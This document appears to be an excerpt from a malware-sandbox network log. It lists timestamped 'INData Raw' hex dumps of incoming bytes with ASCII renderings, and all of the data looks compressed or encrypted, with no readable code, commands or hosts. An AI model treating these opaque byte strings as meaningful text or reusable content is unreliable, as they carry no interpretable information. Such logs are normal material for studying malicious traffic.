                                                                                                                                                    2022-09-29 12:59:13 UTC17243INData Raw: bd 44 3b dd 8b 1a 92 69 97 01 96 b4 42 23 a4 8e 16 d5 fd 70 fe 6b 78 27 49 69 9a 8e aa 7f 2e 84 9d 3d f5 dd 9c f2 70 6f 86 8e 2c fe a5 70 ab ad 03 f6 7d 8c d4 61 79 d8 0e 9c 21 a4 5a 85 dc ad d4 c9 a4 d7 51 ed 69 e1 f4 94 55 60 ea 39 cd 3a fe 31 84 39 8c 51 40 04 03 41 6e 74 cc fa 70 f2 5f 12 a6 6f 5f b8 4f 8a 83 21 0b 04 1f 68 0d 40 be 8e c9 d4 ef 47 3a af 77 6a cf 09 5a 5c 53 9e 52 f6 5d f0 45 e1 f1 2b 78 6b e7 f3 55 e5 ba 70 d9 5d 6a 3f 28 a4 b7 c3 28 2f e1 96 ce a0 de dc af ca ea 2f f0 a1 6a 51 b2 1d 99 a1 5e 51 97 88 33 7d 24 1d a2 bf 2f 64 8d d6 9e cd 46 b2 03 5c be 64 15 3a 9a 46 94 be 10 69 3f 84 eb c3 2c b1 f4 6f 89 42 7d da 22 c2 95 68 f4 cd 3d 55 54 0b d9 67 b4 bf 43 9a ca d6 d7 7f 53 a0 05 de 72 60 5f 75 0c 1d c4 d3 3c 15 a0 bc 4e 1b 55 b1 47
                                                                                                                                                    Data Ascii: D;iB#pkx'Ii.=po,p}ay!ZQiU`9:19Q@Antp_o_O!h@G:wjZ\SR]E+xkUp]j?((//jQ^Q3}$/dF\d:Fi?,oB}"h=UTgCSr`_u<NUG
                                                                                                                                                    2022-09-29 12:59:13 UTC17259INData Raw: e1 9f d9 64 f1 fd e9 64 e5 9e a8 76 93 45 a1 e0 24 40 f4 5e 5f 36 ac 9b 8c 99 50 05 e3 45 56 0c 02 60 b9 87 68 92 92 e6 47 03 50 07 40 2e 73 b3 41 6d 94 ce 9b b3 29 76 26 21 37 f5 3c e4 e9 29 67 42 d2 13 ba 46 fe 48 66 e6 08 de c6 0a 40 52 4e 36 44 02 29 f9 f7 0c 9b 8e ca de f3 fc 83 b5 ba 69 85 d8 87 ef 5b 21 19 7a 60 8c c1 ca dd c5 1c c8 e7 fa 9a 67 7e ad 00 9e ee 1e 78 69 e0 9a f1 b2 6b 02 e4 86 85 b5 b1 47 e4 c4 66 1e a3 3d 9b 51 33 12 5f 65 d6 ff af b9 88 31 b3 5b f8 37 d8 9e 45 b7 05 41 6e c3 19 27 1a 72 0d 8a 0b e0 02 c4 87 54 1a 2d d3 50 a7 f3 30 a9 10 23 40 62 7f 7e d4 3f 9c 50 a5 b6 55 9d f2 69 69 91 e2 25 a9 87 ff d3 23 36 8a 02 0b e0 24 5b f7 28 9c 73 b7 0d 51 fc d7 9e 61 3f e7 a5 46 fa 6b 85 b2 11 38 59 13 45 91 57 0f 49 49 12 cd c3 a2 3b 8f
                                                                                                                                                    Data Ascii: ddvE$@^_6PEV`hGP@.sAm)v&!7<)gBFHf@RN6D)i[!z`g~xikGf=Q3_e1[7EAn'rT-P0#@b~?PUii%#6$[(sQa?Fk8YEWII;
                                                                                                                                                    2022-09-29 12:59:13 UTC17275INData Raw: da 35 1f a9 e6 d4 7e 94 1f 0d 01 79 2c 44 10 61 cf 23 8e 41 2a 57 0e ae ff 64 51 db 9f 25 34 a3 c4 af 22 91 e5 b8 b1 7c ce b3 74 43 67 4b 21 14 99 f3 53 a5 fa 1c 57 cf da bb 43 dd 41 03 b2 35 56 33 64 ba 58 5b 14 5c 91 20 4f 0d bd bf e9 c2 00 1c c5 53 f9 62 eb 96 27 50 5a ff d1 f8 07 9c 92 40 a5 ee 2b 23 73 7e da ee 8b 1a b9 8f d2 44 11 08 21 39 0a 84 e2 c3 9d d9 12 e0 41 56 03 d8 96 41 6e fb ca 83 66 7b fa 99 49 de 2c 4f 31 52 27 64 5c f3 45 f2 a3 d7 aa 8c 3c 49 0f 2d 51 a2 98 3c 51 f8 3d e2 a6 c6 28 37 98 84 da a2 52 6c 12 da 0e dd 4d e7 f4 38 d4 98 80 96 35 8b d3 b7 8f 73 53 8e 80 54 5c a0 85 36 48 3c dc 8b 91 8d ad 7c 1c 6b 97 20 e0 68 24 e9 a8 e7 de 31 72 83 f6 e1 28 0f 48 a7 55 27 33 8d f7 7c 5c 90 cb 28 63 01 39 3e 67 be 95 73 b3 73 6a cb 4f 62 70
                                                                                                                                                    Data Ascii: 5~y,Da#A*WdQ%4"|tCgK!SWCA5V3dX[\ OSb'PZ@+#s~D!9AVAnf{I,O1R'd\E<I-Q<Q=(7RlM85sST\6H<|k h$1r(HU'3|\(c9>gssjObp
                                                                                                                                                    2022-09-29 12:59:13 UTC17291INData Raw: 5a 76 cd 38 49 52 0c ef ee 4a 5f c1 8a 6e 8d c5 de 6c 57 f7 fd 41 23 41 c5 ce ec 52 21 09 95 4f 30 90 97 4c 8a 21 74 b8 5c d5 0f 0a 83 53 10 a2 0c 11 2d 26 6f 04 14 54 41 02 b1 70 a0 e1 c9 1f 95 4a f2 3d 54 5b 87 75 be bc 82 43 0a 1b c3 37 99 c0 9e e1 28 e3 eb 0a 18 d3 3a 99 43 7c 98 17 53 e7 17 37 d6 99 46 1b 8c db f2 6e 0d d0 54 6c 22 a3 76 53 21 46 31 ea ea d1 30 13 da ef 59 d8 e5 90 90 5a f8 68 fc 6f c4 fb ee d2 1e 8e b6 08 cc e6 a6 8a bd 12 2e e5 93 ac 6f 84 94 1c 54 be 0d 77 fd d5 59 cb b7 5f 1a 40 63 be e1 64 80 bd 11 61 51 f6 c3 e7 fe 6f 02 52 e3 20 cb 9a 54 76 e4 72 c8 2b fd bc d9 f1 22 29 fe f8 19 01 06 1a e6 5f e9 c4 87 cc c8 cd e4 9f b0 7f 55 18 4d bb 50 bf be 8a be bf 60 50 9b 55 4a 8b 8d 08 c9 0c 21 a7 dc d0 7c bd ad 11 9b 0a 9b 87 39 74 7a
                                                                                                                                                    Data Ascii: Zv8IRJ_nlWA#AR!O0L!t\S-&oTApJ=T[uC7(:C|S7FnTl"vS!F10YZho.oTwY_@cdaQoR Tvr+")_UMP`PUJ!|9tz
                                                                                                                                                    2022-09-29 12:59:13 UTC17307INData Raw: f7 e8 2c 6a 0a 49 f8 f6 e0 3e b1 f1 81 31 4b ab 66 9d 2c a3 d0 28 b3 3c 91 8d 51 87 be a5 d4 f7 e0 bf 16 c8 bc 1e 00 09 8a 99 8e 17 7f ee 50 c5 cf 41 9a 3c 8b 7f ce 76 b9 aa 38 01 18 2c ef ce 18 58 ca 0f ff e7 9e 20 49 d9 c2 97 3a 9d 86 2f 43 d6 7a bd 5d 20 bc a2 38 6a 58 b8 7a 51 06 3f 80 de 35 bf 4b 96 2c 70 2a f4 76 2b 51 70 18 9b 61 8a 9e a3 e2 b6 e8 ee f4 ce ab d3 78 af 94 82 79 dc 5e 99 94 dd 45 9c 29 44 c6 51 c6 ef 2f c3 4b 9d 99 c2 7d 57 9e 83 e7 88 c6 6d 29 43 39 39 fe 57 42 ed bc a4 f1 bc ba 21 d9 1e 20 f0 bf 21 59 cf b0 90 b0 2c db 17 6c 4e 71 66 79 b2 a2 d6 92 60 98 69 60 dc 11 79 7f 7f 74 ce c3 6f 3f f7 55 63 c7 88 9d cf 94 38 74 43 45 1d cf 8e ee 26 19 f9 fe 05 20 61 d3 3b 55 35 fa 00 68 55 cd 8b 6f ce 90 39 10 37 df 1d 60 a3 b3 26 62 a3 39
                                                                                                                                                    Data Ascii: ,jI>1Kf,(<QPA<v8,X I:/Cz] 8jXzQ?5K,p*v+Qpaxy^E)DQ/K}Wm)C99WB! !Y,lNqfy`i`yto?Uc8tCE& a;U5hUo97`&b9
                                                                                                                                                    2022-09-29 12:59:13 UTC17323INData Raw: f4 ca 14 f9 d1 33 eb fb 1b 50 9c 58 54 29 a0 8c 70 fe b2 40 59 ea b9 25 2b 37 bd b6 41 98 83 ad 68 ef d1 45 c0 8f 4f aa 1e fd d7 d7 6e d8 06 d9 66 2f 2a e1 d5 b5 b7 c3 94 cd 61 88 49 df e8 ff 61 ee da 3e e0 fd a8 7a 91 8b bd af d4 09 6f 28 ca 86 49 3d 79 d9 de a7 27 9a ef 22 8b e8 20 f5 f5 37 54 d3 a0 01 b3 2a 4e d9 1c 64 6b cb 7c c9 4e 49 34 15 0a ac 6d a9 50 a9 61 59 4f 59 48 30 7d 3a 75 a7 ca e9 cc 27 92 77 30 fa da 98 46 09 3b 0f d6 a8 1e aa 4e ea 41 6b b8 5a 18 d7 60 10 fb 58 03 6c 4b 24 23 f6 9d f8 f0 37 31 b0 db 37 45 47 d9 3f 6f 98 6b 56 10 12 e3 a4 03 23 90 2b 7e f1 8d 70 41 a5 d7 8b 21 70 d7 7b 6c 53 9d 34 93 ab 03 11 f8 4a b6 a0 cc d4 16 ae 4f 01 4a 86 af 56 37 20 6c 70 04 13 d1 9a 85 ea df e3 c0 ae 96 7e 7a 36 2a 79 0c 2e 13 5a d6 a7 10 23 3f
                                                                                                                                                    Data Ascii: 3PXT)p@Y%+7AhEOnf/*aIa>zo(I=y'" 7T*Ndk|NI4mPaYOYH0}:u'w0F;NAkZ`XlK$#717EG?okV#+~pA!p{lS4JOJV7 lp~z6*y.Z#?
                                                                                                                                                    2022-09-29 12:59:13 UTC17339INData Raw: 5f e0 ae 55 de 90 68 b4 57 6b c5 5a 25 9e 54 51 12 ed a2 82 31 8b a5 85 d0 52 e0 c6 1f 4e 2a 7e 4b 80 2a c2 ff bf e1 46 55 f0 4f cf 07 ef 72 0d 4d 2c 8d 65 ad 2c 73 8a 5e f7 81 8c aa 06 2d 64 7a ad 2e 02 ec 9f 4f 58 57 51 0e ab 79 d6 18 4a 42 ec 71 6c 85 6c 5a b8 90 d9 c6 04 7c 3c fd ac 71 ea 69 b3 2c fd b8 84 f5 e7 a3 f2 cf a6 91 fb 76 55 97 c5 b4 4d 0e 19 f0 77 47 d4 47 cc f1 44 89 aa 0f 5d 01 40 67 88 ae 28 f7 6f 4e 50 98 65 97 63 3d 7c c1 6f 9a ff fe ca 2b 21 bb cf f4 4c 11 2c ae 28 1f 5e 56 34 77 d0 5d 8d ec c6 84 dc 47 0f 23 95 08 99 de 83 06 1b 13 ae 3e ac bb 67 72 66 6d 8e 03 86 f3 2d ea 7d ad ec 46 e3 92 82 22 67 4b 3b d9 8e cd 34 4c bd 70 f3 f1 d8 25 5b 37 66 be 50 6d 12 07 20 0d fa 87 1b 24 02 4f ef 54 25 77 23 96 fd de 5f 56 82 b0 75 b9 53 a0
                                                                                                                                                    Data Ascii: _UhWkZ%TQ1RN*~K*FUOrM,e,s^-dz.OXWQyJBqllZ|<qi,vUMwGGD]@g(oNPec=|o+!L,(^V4w]G#>grfm-}F"gK;4Lp%[7fPm $OT%w#_VuS
                                                                                                                                                    2022-09-29 12:59:13 UTC17355INData Raw: e3 d2 e5 c6 a1 46 6f 27 be 09 0b c1 00 0f 49 36 b5 49 9b f7 2b a5 0d 26 75 4d 7b 79 3a b5 c6 a3 bf a8 79 06 d4 84 d2 4b bf 18 35 d5 2c ac 36 d9 08 49 33 e8 4e 49 37 3e 55 31 76 b9 83 26 2d c6 8e ea b8 92 56 a2 89 b1 cf e4 b1 d1 8a f0 2c dd 0d 6e 51 ab f1 d5 2d b5 99 67 76 06 36 56 47 49 73 b9 b3 c0 37 c2 0d 34 58 6d a6 47 23 55 2d 3f 46 0d 8b b6 2a e5 96 c8 ce 93 af bf ab 13 df 0d 93 6f 66 2b 05 b0 e4 ef af 5f 52 03 c5 35 fc a0 95 51 8b 5d e2 8d 02 cd f7 22 d0 53 20 c7 41 25 47 cd 4a 0c e9 af b5 7c c3 85 9e 78 cf ec dd af 45 5d 30 73 0c 6b cb 9b 63 7e 6e e8 a2 05 3f 52 9c 90 ba 21 99 7a f6 59 90 3d e7 b0 cc d5 bb 14 40 15 9f 7d fa 02 b5 e1 33 26 db bc e0 32 20 39 43 6e ec 70 7f 2a 5c 6e 23 7d bd 06 1d ba ab cd 6d 61 7c 62 e7 a7 60 18 29 14 c7 34 e4 f5 6b
                                                                                                                                                    Data Ascii: Fo'I6I+&uM{y:yK5,6I3NI7>U1v&-V,nQ-gv6VGIs74XmG#U-?F*of+_R5Q]"S A%GJ|xE]0skc~n?R!zY=@}3&2 9Cnp*\n#}ma|b`)4k
                                                                                                                                                    2022-09-29 12:59:13 UTC17371INData Raw: 9b 89 56 c9 92 6e 3b 8d 26 47 2d 55 1e 2c 37 fe 25 4f 89 4b e2 8b b1 d4 cb a5 31 0b e0 a0 53 31 d5 cc bc 70 aa 75 14 fb 5d cd 85 40 d2 42 b1 5d 61 d8 4c 8f 9c 93 a1 47 16 37 37 42 34 af bd 7a 78 4b a9 73 b9 b0 ab 1c f8 bf de 8e 23 af c3 3f 8e ab 26 30 f1 5a 13 e0 07 84 4d e7 1b dc 75 4d ea 8b 0f 1b 8c 5c b2 a3 ef 57 40 45 7c 1b 58 db 0b 59 bb 33 86 92 56 bb 4a 6b ec c4 49 56 bf 7f 39 0f fb e0 d9 b6 fe 8d 87 cd 73 69 ae dc 39 95 8c 71 43 56 df 03 b7 a4 88 bb ea 70 72 4f fd db eb 93 01 3f e2 91 4c 8e 33 b8 80 4b 74 c4 e2 3a fc c3 d2 b1 5d 6a b7 3d 45 f9 34 ec a1 79 d6 ab b7 e0 fd cf eb df 80 35 1b 63 4c ef 59 5c a1 86 60 78 e5 b3 96 8f 18 76 26 23 5e f0 b2 07 38 cf ea 12 65 c7 10 ec 96 ab 87 15 ec c2 fe e5 d4 09 f3 9b 4a 26 23 dd 2b a0 ea e1 f7 78 34 2b cd
                                                                                                                                                    Data Ascii: Vn;&G-U,7%OK1S1pu]@B]aLG77B4zxKs#?&0ZMuM\W@E|XY3VJkIV9si9qCVprO?L3Kt:]j=E4y5cLY\`xv&#^8eJ&#+x4+
                                                                                                                                                    2022-09-29 12:59:13 UTC17387INData Raw: fa 6b a2 5f 6a dd 48 5f d4 ec 83 60 a8 06 14 2e 25 67 ac 36 b9 98 45 df 3a 57 e6 62 c8 1b 33 d4 b4 a0 eb 68 3e ba a6 88 f4 d9 75 bb 87 39 d5 35 b5 b3 3f 84 5e 94 22 18 d9 90 ac f6 75 a9 23 1c cf f4 31 d9 62 7e 8c 1d f0 c0 cc 17 7e 02 1c 9d 0b d8 88 40 d1 34 d1 8e dd fe 8e ae 3c 1e ac de 3d 53 a3 47 84 19 0b 53 61 7a 8a 5e 54 83 28 85 03 07 4c d9 c5 5a a9 75 8c 84 c0 bc c9 23 c5 d0 6b 98 d1 4a 16 a5 ab 9a 54 9d de a6 92 dc 3a d8 f3 a7 d6 3d 6d d2 b5 45 43 c2 5e 4f bb e5 c5 c8 25 ce 67 5a c1 d4 f0 2c fc 7f 7f e1 8d 47 65 bc c7 60 c1 65 12 12 5e 0c 24 19 15 ba d1 e1 fa 8d 2c f6 69 b0 fa d8 34 71 1b 2c 60 f9 88 cc 9b 78 96 95 d5 6b 39 12 24 84 2b 63 13 90 25 e8 41 c6 76 9c a5 5d cf 95 23 c5 ee 40 59 31 b0 7b c4 14 22 94 b9 9a 9e 28 ae 29 e0 48 fb da c3 dc 74
                                                                                                                                                    Data Ascii: k_jH_`.%g6E:Wb3h>u95?^"u#1b~~@4<=SGSaz^T(LZu#kJT:=mEC^O%gZ,Ge`e^$,i4q,`xk9$+c%Av]#@Y1{"()Ht
                                                                                                                                                    2022-09-29 12:59:13 UTC17403INData Raw: ad 73 c8 06 32 9e 40 77 6d e7 e1 2a bd 73 ef 42 37 15 f6 4c 7e 63 61 89 a7 78 0b 40 05 98 36 14 e7 5f 79 88 81 e7 a3 31 d7 5c e2 f2 f5 28 77 df 7f e8 36 e4 7e f5 1e 3f 54 dd 9d 34 bf 30 47 77 ae 15 cb d9 37 18 d8 bc 6e e1 8f 02 59 70 4e aa 8e 63 25 2a e9 35 f6 8b 7f b1 2f d2 15 34 90 ce ee e8 3d ea b5 59 3d 5e d7 24 c0 ee de 6e fb b4 b2 7c e4 d2 8c 33 55 d0 a6 78 7f 06 e8 77 a0 39 f7 33 16 e4 38 ec 38 97 69 06 2e a5 9b 4d df a0 35 6b 69 0d 84 bc ed 04 c9 c1 5e e0 08 48 0c 6f c1 46 f4 58 62 c8 c9 46 37 74 62 a9 f6 4a b1 1a a6 0e 73 be 11 24 56 06 33 b3 a0 56 fd c0 2c 2d 68 9e 20 d4 5a ff 0c b2 0e 05 50 4d 83 7d 7c 06 e6 b1 e4 f1 cc e1 bd 1f 22 df 2e 62 b2 7a 6d 0c 39 af 56 9d 41 a7 2c 0b ce b2 0a 1d 27 40 ba f4 76 9f 43 7f 12 ec 72 fd 40 93 e6 3f 44 3f 24
                                                                                                                                                    Data Ascii: s2@wm*sB7L~cax@6_y1\(w6~?T40Gw7nYpNc%*5/4=Y=^$n|3Uxw9388i.M5ki^HoFXbF7tbJs$V3V,-h ZPM}|".bzm9VA,'@vCr@?D?$
                                                                                                                                                    2022-09-29 12:59:13 UTC17419INData Raw: d6 4b 80 00 29 de 75 77 bf 1f 1d 59 e3 81 86 0e ba ea e2 0d 91 2f 06 6e 5d ae 08 39 42 87 75 95 69 1b 82 29 8d 7a 4d 82 52 14 7e 22 6e 8e e1 6f ee be 70 a6 09 85 ca a8 be 70 fa 9c 3e 87 c4 95 e8 1e b9 f9 39 7e 4e 4d 3c 6a 95 90 11 15 9f dd 16 99 93 66 55 36 87 ce b0 7e 83 c9 82 5c 67 e9 2b a7 70 b9 35 62 ae 19 57 34 e5 b4 b0 47 0c fc f7 d0 e9 47 dd 88 ed 2c 92 8c 4c 3d 3c 38 92 73 b1 0b 89 f6 aa c1 f6 81 41 d4 62 ee 93 77 37 05 f8 dd 5e d0 bb 20 29 d9 7d bc ec 82 56 0a cc c5 cc f3 2b 4f 2f e0 6e 15 81 03 e0 38 c6 be fc 16 95 ac ff b9 66 4b 35 ad c4 6a ee 5e b5 10 c0 50 5d 68 7d 93 e9 7d 33 d8 a3 fb 45 88 93 e7 f9 6c 4e cd 80 87 62 16 ce 1a bc a1 ad 94 4d 3f d7 e3 61 8d d9 9e c8 64 68 37 bc 59 a5 a5 82 1c 59 20 13 16 22 63 28 28 45 1f ff 7f b6 71 69 fe 1f
                                                                                                                                                    Data Ascii: K)uwY/n]9Bui)zMR~"nopp>9~NM<jfU6~\g+p5bW4GG,L=<8sAbw7^ )}V+O/n8fK5j^P]h}}3ElNbM?adh7YY "c((Eqi
                                                                                                                                                    2022-09-29 12:59:13 UTC17435INData Raw: aa 85 4b 92 15 4d bf d6 ca 35 17 f1 1e b1 02 54 72 14 3d a7 36 07 34 01 fe 80 a4 05 30 55 ac ee 1c dd 04 d5 bb f1 f7 83 ff b9 e4 ec 34 5f 36 f5 df ac ae 78 f0 08 06 58 22 74 f1 f9 82 90 6b de eb ff 43 75 99 99 ba 83 60 c3 52 19 9e 2f 38 7e 5a f7 f6 f0 d5 18 4a 9d fe a7 e9 c9 c1 3b 8a 36 c0 dd 3f 37 2e ee 8f 71 3a ec 90 14 ce 21 77 b8 32 70 56 51 87 ef fe d3 27 c0 03 50 f3 1b 63 89 b0 9a 3f ac 1a cd 09 97 f9 6d 47 0d 4d 31 1a e7 ca 6e 54 e7 50 72 9b 86 ee a8 7a 34 78 bf 6c 74 d6 50 1a 53 12 3f 21 2e 11 b2 44 c1 f8 b7 d9 b5 80 d3 f4 86 88 8e fd 04 80 ed 31 07 f6 4d 18 e4 13 03 4f b2 58 6c db 1b 54 67 69 e2 c9 61 d7 9b 53 ee bc 90 e7 f5 64 ed e8 3c 08 ea f7 8a c4 b6 0a 07 fc 23 69 df d9 ea ce 7b c5 47 65 85 5d 18 5e ae 17 88 af c9 fd cd ba 87 98 65 ca 35 dc
                                                                                                                                                    Data Ascii: KM5Tr=640U4_6xX"tkCu`R/8~ZJ;6?7.q:!w2pVQ'Pc?mGM1nTPrz4xltPS?!.D1MOXlTgiaSd<#i{Ge]^e5
                                                                                                                                                    2022-09-29 12:59:13 UTC17451INData Raw: 2d c5 b7 aa 5f 5f 51 d2 a8 d5 5f 62 b7 cb 3b 6c 3f f7 51 4b b7 24 41 0c 7d c1 d5 6e 19 1c 44 ad 0e 4d a7 0a e5 4b 2f c9 49 b0 96 71 31 f4 d4 68 38 75 e9 45 ed 84 f2 2d a3 0f 90 9e 2e e2 3a c6 30 23 29 e8 16 68 ae 54 f5 3a 30 15 99 e6 ce f0 d2 24 c9 e6 8f d3 03 53 bb e1 94 ce dc 7d 8f 25 e1 ce 1d 79 b8 ed a1 9f b8 6c 91 09 67 d6 7a 36 fa e6 8d c0 c2 d3 7a 3f 68 fe a8 9f 03 be cf fa 02 64 0f 17 65 ea f4 ff 45 90 5a 6d 13 70 71 02 1c 91 1b 6d 93 2a b6 25 33 ce 06 81 73 42 17 17 6a 39 a5 cd eb 68 d3 14 0a f3 07 9d 38 fe 3e 87 66 d8 27 3b e7 ea 96 61 02 86 17 83 fd 42 8c 83 1e af 95 28 92 d0 58 fd c5 97 44 62 15 2e 60 f5 0d 1b 8f ca 9a af 97 26 5a ca 46 4d a4 13 ce 78 fa d6 4b 50 c7 06 54 56 ce 9c bc b7 68 01 33 36 fd 1c 44 b9 ed 51 fb 40 e8 32 2b 96 f4 0c 04
                                                                                                                                                    Data Ascii: -__Q_b;l?QK$A}nDMK/Iq1h8uE-.:0#)hT:0$S}%ylgz6z?hdeEZmpqm*%3sBj9h8>f';aB(XDb.`&ZFMxKPTVh36DQ@2+
                                                                                                                                                    2022-09-29 12:59:13 UTC17467INData Raw: 2c 1a dc 77 fb 51 63 57 e1 73 7b b0 19 e6 8c 62 db 1f f5 fd 7b 12 bf 70 c4 72 1e e9 de e0 7f 0c 21 de 9e f1 f2 01 9a 29 61 24 a6 80 f6 62 c8 cc be 00 e1 f2 2f 0c cc 72 97 84 9c a2 36 ee 26 5d 45 8a 51 9c 1c a9 a8 73 0d 94 bb dd bf 80 33 bb c2 2b f7 c5 48 ad 94 03 be b0 c6 00 45 32 7e 57 2c c8 dc e5 35 fc 8b 3a 7f 7e c0 65 6d 35 8d f2 0d b9 0a bd cb 95 61 e0 90 37 8e 06 28 fd 7b 01 06 8c 8d a3 57 7a 7a 84 df a0 a2 5f 50 d2 91 79 ff a8 97 b8 36 cd 6a d1 17 f5 96 e8 81 49 c2 c7 47 e8 64 a6 05 c3 dd 20 d1 b6 70 e7 68 d0 db f3 70 23 32 54 d7 70 c3 f6 73 94 95 1d 87 84 94 cd 6f 7a c9 01 23 3b 2c 35 d9 e0 6a 08 c5 a2 64 13 f0 60 ac 10 2d 39 18 98 b6 27 8a 68 c8 1f 76 51 fc a1 35 23 2d 73 fc 15 a7 32 4d 17 b6 ff 39 b4 be f1 9d 00 ea e9 f0 d9 c7 50 ef 5a e5 d4 58
                                                                                                                                                    Data Ascii: ,wQcWs{b{pr!)a$b/r6&]EQs3+HE2~W,5:~em5a7({Wzz_Py6jIGd php#2Tpsoz#;,5jd`-9'hvQ5#-s2M9PZX
                                                                                                                                                    2022-09-29 12:59:13 UTC17483INData Raw: c1 3d 79 40 b2 e2 e4 52 b1 fa b2 7d 04 1b dd db 7c 9a c6 8b c3 24 1b 07 10 c5 51 9d 1a 34 b9 ee 5a a7 34 73 ed 92 55 90 0c af 94 1c 50 93 c4 c6 d5 13 5a 56 dc 57 90 78 22 f9 0a f2 ce 5c 4b d5 48 e2 8d 70 14 fe 9c 63 f2 2e 29 99 f1 90 42 41 6a a6 bc 2b dc 0d 9a 84 c2 ea b3 39 90 0f a1 db 73 75 96 52 7b 6b 46 00 4e 36 10 92 e7 22 dd 71 20 a2 68 40 cb 44 b3 91 b3 6e ca c4 83 4a 72 59 ed e4 69 ff ec 46 00 2f fb 79 ce e4 b2 bb c5 45 31 81 39 6a 20 9b f0 b5 2f b1 86 f5 4a 0c 30 58 b3 e4 8d 7b 04 70 4d d4 b6 3a dd 3e 33 72 b9 a7 2c 5f 95 e3 3d 52 bb 9b 21 2e 52 62 f9 67 23 5e 19 37 37 8a a0 2d 23 4a b5 7e f8 f3 94 9c 81 fa 40 e4 9e db c0 df ce 6b ff c0 17 69 04 a5 d6 01 d8 3b 13 ae 95 12 97 7d d6 dc f9 f6 81 3a 94 79 12 79 a7 9b e5 18 8f 7c 50 c0 64 83 14 96 27
                                                                                                                                                    Data Ascii: =y@R}|$Q4Z4sUPZVWx"\KHpc.)BAj+9suR{kFN6"q h@DnJrYiF/yE19j /J0X{pM:>3r,_=R!.Rbg#^77-#J~@ki;}:yy|Pd'
                                                                                                                                                    2022-09-29 12:59:13 UTC17499INData Raw: d9 9f f5 b2 52 64 31 d6 33 7d 01 e9 53 d4 2f 8c ba af cc 31 1b ec 29 f1 cd 39 5e 0c e9 3b b9 58 a3 4b 2a ef 5b 0e 0a 4d 3f 02 5b cc 58 05 88 b8 03 bd 58 cd 13 7d 18 ac 20 22 d5 59 86 cf 8c 97 93 fd 2d 8a af d2 6f 43 97 e4 8e 51 c2 ac 18 40 15 c6 81 d1 b3 67 8e 4d e1 ca bd e9 ac 79 39 23 91 8d 3b 6b 0e f9 4e cf ed f6 2c 46 3d ef 3c 99 d3 b6 f9 46 b1 91 54 17 2d fe 88 eb 27 c7 b7 e5 96 dd 97 88 a3 d4 f4 71 e1 76 f8 8e 94 09 7a 55 e3 08 cc 76 63 37 94 b0 ae 35 f5 9c 1b f7 de 9e 8b ac c6 21 93 0e 87 1c 5e 31 ed 45 cb 35 b3 2e 7f ae c2 66 8f a7 7c cf 8e 0f 40 9a 8e 47 bf 87 1d 79 74 9f f8 26 11 18 e8 76 db b8 9a 9b 91 bb cd 95 d7 7b de dc b5 73 f7 a1 84 1b f5 dd 45 26 7c 82 85 b1 b3 8e 0a c3 8d 76 8a f6 f2 91 28 94 30 96 47 cf e8 39 4a 80 81 0d 94 2e ef 27 1a
                                                                                                                                                    Data Ascii: Rd13}S/1)9^;XK*[M?[XX} "Y-oCQ@gMy9#;kN,F=<FT-'qvzUvc75!^1E5.f|@Gyt&v{sE&|v(0G9J.'
                                                                                                                                                    2022-09-29 12:59:13 UTC17515INData Raw: 1a 8d 47 0d 63 58 26 74 29 9b d8 01 c7 e5 92 3a c6 37 cc a0 c9 30 0d b1 de 5d b7 22 40 fe 89 02 19 c4 70 44 3e 3f d7 8b 55 37 f9 85 be 71 93 0d 69 a4 a7 a4 b3 77 16 f1 f7 e1 80 c1 99 d4 80 c8 d0 67 15 83 e2 20 6c d7 09 61 8f 18 11 ea 67 74 9b 1c 33 76 45 09 d6 04 17 39 cc 73 53 08 0b c6 bc cb 79 71 ce d5 0c 60 51 5f 5b e7 b0 0e 0d ed fa b7 d3 52 71 27 df 27 a5 f9 5e 01 17 e5 39 3c ef 70 1b 1a 98 12 b6 2f fa d4 e9 96 6e 96 ba e9 22 0a dc 39 45 3c 59 33 57 ff 39 45 df af 48 89 f9 3f bf a8 07 20 f8 76 8a 48 cf ce 21 0b 96 82 79 6f 31 4e b1 82 f0 3c b9 6c 0b ba 75 6b 93 b6 f2 4c 5a 4b 55 c0 05 6c c1 fa cb aa 64 10 17 d9 3d 66 46 64 02 26 7c 1e de 20 00 98 28 a9 50 e1 92 84 d0 e5 57 6f 85 b5 b0 36 c7 cb 87 b1 81 b0 8f 0a 46 3c 0e 0e 1b b8 a9 8f 56 99 05 b5 ec
                                                                                                                                                    Data Ascii: GcX&t):70]"@pD>?U7qiwg lagt3vE9sSyq`Q_[Rq''^9<p/n"9E<Y3W9EH? vH!yo1N<lukLZKUld=fFd&| (PWo6F<V
                                                                                                                                                    2022-09-29 12:59:13 UTC17531INData Raw: b3 f9 38 9c f8 ad e4 52 67 b6 92 9f b9 58 de 04 4c 3a d4 4e a0 e0 61 aa bb b9 e7 34 0d fb cc 02 6d e7 29 d2 ae 54 1b 57 1d 08 58 7e 32 37 90 b9 b5 07 f9 30 9e 0f 43 c8 e5 15 61 b3 a0 8f e0 ad e0 63 f6 a9 ba 36 b9 1f 21 6e bd ca 29 c3 34 b0 be f1 6a f8 46 32 2b 56 f5 b5 d4 14 6d f1 b5 1a 4b 59 a1 b9 31 5d 8b a4 30 ce a3 c2 3e 43 d8 2a b2 25 0f 6b b7 56 a1 ce 6e 83 e4 7d e5 b0 4e 38 8c cd 41 e5 9d 9a b0 b6 76 ee f0 70 2f 4c d2 7d d4 bc 8f 20 08 d4 6e 32 da b3 01 81 98 1e fa de 81 7f 10 53 9a e7 d6 56 e8 53 0c 17 c5 c2 ed 9b ef dd 0a 5a cd be 57 5a 8e 10 f6 32 ab 37 ca be 0a aa 33 7a 5f 83 e6 71 75 c8 56 e9 42 35 ef 04 e3 14 0f 7b 67 3f 94 37 e5 5e 2d c2 49 5c 77 3a d2 8b 5a 0b 33 32 da 51 bf d1 f5 a0 b7 ac 9f 3e 58 51 cb d9 28 99 39 26 52 2c 7c d0 f2 6e 6a
                                                                                                                                                    Data Ascii: 8RgXL:Na4m)TWX~270Cac6!n)4jF2+VmKY1]0>C*%kVn}N8Avp/L} n2SVSZWZ273z_quVB5{g?7^-I\w:Z32Q>XQ(9&R,|nj
